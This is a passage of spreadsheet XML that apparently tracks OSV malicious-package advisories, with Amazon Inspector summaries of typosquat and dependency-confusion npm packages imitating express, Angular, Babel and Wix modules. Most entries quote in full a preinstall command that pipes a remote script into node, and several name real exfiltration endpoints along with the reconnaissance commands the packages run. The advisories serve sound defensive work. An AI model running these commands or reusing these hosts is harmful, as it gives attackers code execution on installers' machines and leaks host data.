      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr"/>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (713c302594ab7c41e8034ca95478045afafba98e223ea62def160f080cb879cd)
thunderboltRegistry.js runs an IIFE on module load that executes host reconnaissance commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and transmits the collected output together with hostname, platform, and pid to a hardcoded external URL https://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f via fetch. The package exports factories under names matching Wix internal registry modules (thunderboltRegistry, corvidRegistry, siteAssetsRegistry, editorRegistry, documentManagementRegistry) and ships a manifest referencing parastorage.com URLs, so any environment loading it as a drop-in Wix thunderbolt registry triggers the exfiltration payload on require(). The declared CSS @starting-style polyfill purpose has no relationship to the shipped behavior.
</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17488</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17489</t>
        </is>
      </c>
      <c r="D146" s="5" t="inlineStr"/>
      <c r="E146" s="5" t="inlineStr"/>
      <c r="F146" s="5" t="inlineStr"/>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>npm:express-enhanced</t>
        </is>
      </c>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr"/>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (15d6ce3e4c988439e6023bb900fde41c1a7eebe0c372eddc3a3c3c9d8206a9d6)
express-enhanced@5.2.2 impersonates the express package: it ships the express README verbatim, declares `TJ Holowaychuk` as author, and points `repository` at `expressjs/express`, while publishing under a different name. The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading an unpinned JavaScript payload from a gitflic.ru account unrelated to the express maintainers (wrapped through web.archive.org) and piping it directly to node at `npm install` time. The fetched content is not integrity-checked, the source is mutable and attacker-controlled, and execution happens automatically on install, giving the publisher arbitrary code execution on any machine that installs the package.
</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17489</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17490</t>
        </is>
      </c>
      <c r="D147" s="5" t="inlineStr"/>
      <c r="E147" s="5" t="inlineStr"/>
      <c r="F147" s="5" t="inlineStr"/>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>npm:express-fork</t>
        </is>
      </c>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr"/>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d)
express-fork@5.2.2 is a typosquat of the express package. Its package.json metadata (description, author, repository, keywords) is copied verbatim from express, while package.json line 98 defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/...?file=node.js | node`. On every `npm install`, the hook fetches an unpinned JavaScript file from a third-party gitflic.ru account unrelated to the Express publisher (via a web.archive.org wrapper) and pipes it directly to the Node interpreter, with no integrity or signature check. The fetched content executes with the privileges of the installing user and can perform arbitrary actions on the installer's machine, including credential theft, persistence, or further payload delivery. The impersonation of express is the lure that causes typo-based installs to trigger the remote-exec hook.
</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17490</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17491</t>
        </is>
      </c>
      <c r="D148" s="5" t="inlineStr"/>
      <c r="E148" s="5" t="inlineStr"/>
      <c r="F148" s="5" t="inlineStr"/>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>npm:focus-visible-polyfill-lite</t>
        </is>
      </c>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr"/>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5225b5a8636a589f9b90272ad04c3f4104670a23d5c24b45f6aeaa757a4f2a2b)
The package is advertised as a focus-visible polyfill but ships thunderboltRegistry.js, which impersonates Wix thunderbolt internal registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) via a Proxy-backed export stub. When the module is required, an IIFE at the top of the file uses child_process.execSync to run host reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and sends the command output along with a beacon (Node version, platform, pid) via plain-HTTP GET requests to a hardcoded attacker-controlled endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package self-labels the beacon as 'rce-poc'. The shape is a dependency-confusion / typosquat payload: a benign-sounding public package shadows Wix-internal registry names so that a build pipeline resolving these names from the public registry executes the reconnaissance payload with the installer's privileges on module load.
</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17491</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17492</t>
        </is>
      </c>
      <c r="D149" s="5" t="inlineStr"/>
      <c r="E149" s="5" t="inlineStr"/>
      <c r="F149" s="5" t="inlineStr"/>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/cli</t>
        </is>
      </c>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr"/>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)
Package is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any `npm install @angularr/cli` performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.
</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17492</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17493</t>
        </is>
      </c>
      <c r="D150" s="5" t="inlineStr"/>
      <c r="E150" s="5" t="inlineStr"/>
      <c r="F150" s="5" t="inlineStr"/>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/core</t>
        </is>
      </c>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr"/>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365)
The package's npm preinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every `npm install`. The destination (gitflic.ru under a user path `hellscripter/install-scripts`, routed via a web.archive.org proxy) is unrelated to any `@angular` publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name `@angularr/core` is a one-letter variant of the widely-used `@angular/core`, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17493</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17494</t>
        </is>
      </c>
      <c r="D151" s="5" t="inlineStr"/>
      <c r="E151" s="5" t="inlineStr"/>
      <c r="F151" s="5" t="inlineStr"/>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/router</t>
        </is>
      </c>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr"/>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user `hellscripter`, proxied via web.archive.org) and piping it directly into Node for execution during `npm install`. The code executes with the installer's privileges before any package code is loaded. The package name `@angularr/router` (double-r) resembles `@angular/router`, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.
</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17494</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17495</t>
        </is>
      </c>
      <c r="D152" s="5" t="inlineStr"/>
      <c r="E152" s="5" t="inlineStr"/>
      <c r="F152" s="5" t="inlineStr"/>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/cli</t>
        </is>
      </c>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr"/>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)
The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on `npm install`, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.
</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17495</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17496</t>
        </is>
      </c>
      <c r="D153" s="5" t="inlineStr"/>
      <c r="E153" s="5" t="inlineStr"/>
      <c r="F153" s="5" t="inlineStr"/>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/core</t>
        </is>
      </c>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr"/>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at `npm install` time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name `@angulra/core` resembles Angular ecosystem names while the package description (`Core Libs`) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running `npm install` on this package executes arbitrary remote code with the installing user's privileges.
</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17496</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17497</t>
        </is>
      </c>
      <c r="D154" s="5" t="inlineStr"/>
      <c r="E154" s="5" t="inlineStr"/>
      <c r="F154" s="5" t="inlineStr"/>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr">
        <is>
          <t>npm:@babell/core</t>
        </is>
      </c>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr"/>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b)
The package's package.json defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading a JavaScript file from a third-party host (gitflic.ru/hellscripter, fetched through web.archive.org) and piping it directly into Node for execution at install time. The content fetched is unpinned, served from a non-publisher host unrelated to Babel, and executed with the privileges of the installing user. The package name `@babell/core` differs from the legitimate `@babel/core` by a single character, and its description, author, repository, homepage, and README all impersonate the real Babel project, serving as a delivery vehicle for the dropper.
</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17497</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17498</t>
        </is>
      </c>
      <c r="D155" s="5" t="inlineStr"/>
      <c r="E155" s="5" t="inlineStr"/>
      <c r="F155" s="5" t="inlineStr"/>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr">
        <is>
          <t>npm:@kibt/www-nuxt-i18n</t>
        </is>
      </c>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr"/>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ab1895c73507311b9efd31e40015529d9d7735c87e50cf3b714e6e520205ec4)
The package is a stub whose index.js exports a Proxy returning no-op functions for every property access, allowing bundlers that import any member of the expected real package to succeed. The package.json declares a postinstall script `node beacon.cjs`, and index.js also loads the same beacon at require() time. beacon.cjs collects installer host metadata — os.hostname(), the install directory (__dirname), process.cwd(), and process.version — and POSTs it to the hardcoded plain-HTTP bare-IP endpoint http://185.158.107.175:8787/_ah/dc. The destination is not affiliated with any legitimate publisher, the package provides no real functionality, and an in-source comment frames successful installs as evidence of a hit — matching the canonical dependency-confusion / namesquat validator shape where host identity is reported back to the operator to confirm which internal environments resolved the attacker-controlled scoped name.
</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17498</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17499</t>
        </is>
      </c>
      <c r="D156" s="5" t="inlineStr"/>
      <c r="E156" s="5" t="inlineStr"/>
      <c r="F156" s="5" t="inlineStr"/>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/core</t>
        </is>
      </c>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr"/>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557)
The package's package.json declares a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during `npm install`. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path `hellscripter/install-scripts` and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name `@nagular/core` additionally resembles the Angular ecosystem (`@angular`), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.
</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17500</t>
        </is>
      </c>
      <c r="D157" s="5" t="inlineStr"/>
      <c r="E157" s="5" t="inlineStr"/>
      <c r="F157" s="5" t="inlineStr"/>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/router</t>
        </is>
      </c>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)
package.json declares a preinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at `npm install` time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope `@nagular/router`, a name likely to be confused with `@angular/router`, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.
</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17500</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17501</t>
        </is>
      </c>
      <c r="D158" s="5" t="inlineStr"/>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="inlineStr"/>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>npm:a11y-tabindex-manager</t>
        </is>
      </c>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ce127c3e1cadd4f544a5f2580f2db030e3d9e3667d7b0e3399d85b59eb354045)
